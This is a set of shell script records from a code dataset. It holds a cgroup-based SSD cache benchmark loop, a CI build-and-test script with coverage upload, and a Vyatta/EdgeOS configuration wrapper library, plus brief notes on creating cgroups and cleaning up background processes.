cgexec -g "blkio:fo1" ./smr-ssd-cache 0 0 3 0 0 $total_ssd $total_fifo $first_cache_num 1 > part32_user0_test$i.txt &
cgexec -g "blkio:fo2" ./smr-ssd-cache 1 1 8 0 20000000 $total_ssd $total_fifo $second_cache_num 1 > part32_user1_test$i.txt &
wait
done
| true |
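The script assumes the blkio cgroups fo1 and fo2 already exist; a sketch of creating them beforehand with cgroup-tools (group names as used above):

#!/bin/bash
# cgcreate ships with the cgroup-tools package.
cgcreate -g blkio:fo1
cgcreate -g blkio:fo2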
5f936db08667837b9bf120230f91e3be2240decd
|
Shell
|
thoughtpalette/Tetra
|
/run-build.sh
|
UTF-8
| 419 | 3 | 3 |
[] |
no_license
|
#!/bin/bash
export DISPLAY=:10
Xvfb :10 -screen 0 1366x768x24 -ac &
PIDS[0]=$!
#google-chrome --remote-debugging-port=9222 &
#PIDS[1]=$!
node server &
PIDS[2]=$!
sleep 2
npm test
RESULT=$?
cat ./coverage/net/lcov.info | ./node_modules/codecov.io/bin/codecov.io.js
for i in "${PIDS[@]}"
do
if ! kill $i > /dev/null 2>&1; then
echo "SIGTERM fail on process $i" >&2
fi
done
exit $RESULT
| true |
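Killing the saved PIDs by hand works until npm test is interrupted; a trap makes the cleanup run on any exit — a minimal sketch:

#!/bin/bash
PIDS=()
cleanup() {
for pid in "${PIDS[@]}"; do
kill "$pid" > /dev/null 2>&1 || echo "SIGTERM fail on process $pid" >&2
done
}
trap cleanup EXIT
sleep 100 & PIDS+=($!)   # stand-in for Xvfb / the node server
sleep 1                  # stand-in for the test run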
7013367071a3f5283419857ad31f6fd1f1e7f2a3
|
Shell
|
CEnnis91/edgeos-scripts
|
/lib/vyatta.sh
|
UTF-8
| 1,152 | 3.859375 | 4 |
[
"Unlicense"
] |
permissive
|
#!/bin/bash
# vyatta.sh
__SELF_DIR="$(dirname "$(readlink -f "${BASH_SOURCE[0]}")")"
# shellcheck disable=SC1090
. "${__SELF_DIR}/globals.sh"
if [[ "$DEBUG" == "1" ]]; then
CMD_WRAPPER="echo"
else
CMD_WRAPPER="/opt/vyatta/sbin/vyatta-cfg-cmd-wrapper"
if [[ ! -e "$CMD_WRAPPER" ]]; then
echo "ERROR: cannot find vyatta-cfg-cmd-wrapper"
exit 1
else
if [[ 'vyattacfg' != "$(id -ng)" ]]; then
exec sg vyattacfg -c "$0 $*"
fi
fi
fi
check_config() {
# shellcheck disable=SC2155
local key="$*"
# shellcheck disable=SC2086,SC2155
local exists="$(exec_config show $key)"
case $exists in
*is\ empty) return 1 ;;
*not\ valid) echo "$exists"; return 0 ;;
*) return $DEBUG ;;
esac
}
exec_config() {
# shellcheck disable=SC2155
local commands="$*"
"$CMD_WRAPPER" begin
while read -r command; do
if [[ -n "$command" && ! $command =~ ^[\ \t]*#.*$ ]]; then
# shellcheck disable=SC2086
eval "$CMD_WRAPPER" $command
fi
done < <(echo "$commands")
"$CMD_WRAPPER" end
}
| true |
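A usage sketch for exec_config, assuming vyatta.sh has been sourced; set system host-name is a standard Vyatta configuration path, and the value here is hypothetical:

exec_config "
set system host-name edge-router-01
commit
save
"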